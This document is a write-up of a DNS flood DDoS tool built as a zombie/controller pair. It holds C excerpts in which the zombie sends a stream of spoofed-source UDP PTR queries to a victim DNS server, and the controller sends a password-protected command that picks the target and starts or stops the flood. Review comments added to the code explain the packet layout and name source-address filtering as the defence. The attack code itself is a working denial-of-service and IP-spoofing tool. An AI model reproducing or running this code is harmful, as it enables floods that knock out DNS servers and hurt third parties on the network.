=================================================================================
※ This file was coded by Extirpater ( extirpater@crosswinds.net )
server.c -- runs on the zombie PC
client.c -- sends an attack command to the zombie PC
environment -> all three PCs are on the same network.
attacker, zombie : VM( vmware : bridged )
DNS server : real PC (58ya server)
there is only one zombie -_-;
=================================================================================
< zombie PC >
- compile the source (server.c) and run it in background mode
- # netstat -apnu
- opened UDP port 49313 ( 58ya is the mask name; the default port is 49313 and the default name is vi -0- )
=================================================================================
< attacker PC>
- compile the source (client.c) and send an attack CMD to the zombie PC
=================================================================================
< captured packets >
src address dst address
(spoofed IP ) (victim DNS server)
- spoofed IPs are sequential (-> the start IP can be modified in the source file)
=================================================================================
< victim DNS server >
-
top CMD n monitoring
=================================================================================
<client.c>
...
...
// Parse argv[3], the dotted-quad address of the DNS server (victim), into the
// four octets ip[0]..ip[3].
// NOTE(review): the declaration of ip is outside this excerpt; %d requires int
// elements -- confirm. The sscanf return value is discarded on this line.
sscanf(argv[3], "%d.%d.%d.%d", &ip[0], &ip[1], &ip[2], &ip[3]);
...
...
// Build the command payload for the zombie. Layout written by this format string:
//   byte 0     : on_off, the check value (attack | stop)
//   bytes 1..4 : the four octets of the DNS server address (victim), one raw byte each (%c)
//   bytes 5..  : PASSWORD, appended as plain text
// This is the same layout the server.c excerpt on this page reads back
// (command[0], command[1..4], command[5..]).
// The password is placed in the payload unencrypted; if command is sent unchanged
// (the send call is outside this excerpt) it is a fixed string that can be matched
// in a capture of the command channel.
sprintf(command, "%c%c%c%c%c%s", on_off, ip[0], ip[1], ip[2], ip[3], PASSWORD);
...
...
=================================================================================
<server.c>
...
...
// Main loop of the zombie-side program. Each iteration does two things:
//   1. if running==1, emit one DNS query with a spoofed source address;
//   2. poll for a command packet and, if it carries PASSWORD, update the
//      running state and the destination address.
// What this produces on the wire, per the lines below: UDP datagrams to port 53
// carrying PTR-type questions for numeric names under in-addr.arpa, with source
// addresses that increase by one per packet. Spoofed sources of this kind are what
// egress source-address validation (BCP 38) is meant to drop.
while(1)
{
if(running==1)
{
// Build the query name in DNS label format (length byte, then label text):
// four labels filled from myrand(), then "in-addr" (length 7) and "arpa" (length 4).
// NOTE(review): the \3 length bytes only match if myrand() always prints as
// exactly three digits; myrand() is outside this excerpt -- confirm.
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
// strcpy also copies the terminating NUL, so a zero byte follows the name in data.
strcpy(data,namez);
// Two 16-bit values are stored right after that NUL: 12, then 1. In a DNS question
// these positions are QTYPE and QCLASS, where 12 is PTR and 1 is IN.
// ntohs() is applied to the host-order constants before each store.
*((u_short *)(data+strlen(namez)+1))=ntohs(12);
*((u_short *)(data+strlen(namez)+3))=ntohs(1);
// udp_send is defined outside this excerpt; presumably its arguments are
// (socket, source IP, destination IP, source port, destination port, buffer, length).
// Source port is 2600+myrand(), destination port is 53.
// NOTE(review): data presumably points into buffer2; the relation is not shown here.
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
// Pause 30 microseconds between packets.
usleep(30);
// Advance the source address by one for the next packet: convert to host byte
// order, increment, convert back to network byte order.
s_ip=ntohl(s_ip);
s_ip++;
// back to network byte order for the next udp_send
s_ip=htonl(s_ip);
}
// Poll for a command: get_pkt (outside this excerpt) is given command and the
// value 25, and its result must exceed 5 -- presumably a byte count, i.e. more
// than the 5 bytes of flag + address. TODO confirm against get_pkt.
if(get_pkt(sockfd, command, 25)>5)
{
memset(passw0rd, 0, sizeof(passw0rd));
for(i=5;i<26;i++)
// Copy command[5..] into passw0rd, stopping after the first NUL byte.
// NOTE(review): the loop can reach command[25] and passw0rd[20]; the sizes of
// both arrays are declared outside this excerpt -- confirm they are in bounds.
{
passw0rd[i-5]=command[i];
if(command[i]==0) break;
}
if(strstr(passw0rd, PASSWORD)!=0)
// Password check: strstr is a substring search, so the command is accepted when
// PASSWORD occurs anywhere in the copied bytes, not only on an exact match.
{
// Byte 0 becomes the new running state; the query branch above runs only when it is 1.
running=command[0];
memset(dest_ip, 0, sizeof(dest_ip));
// DNS server address (victim): bytes 1..4 are formatted back into dotted-quad text,
// then converted by host2ip (outside this excerpt) into d_ip, the destination
// used by udp_send above.
sprintf(dest_ip, "%d.%d.%d.%d", command[1], command[2], command[3], command[4]);
d_ip=host2ip(dest_ip);
}
}
}
...
...
=================================================================================
Cheeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeer up!!!!!!!!!!!!!!
=================================================================================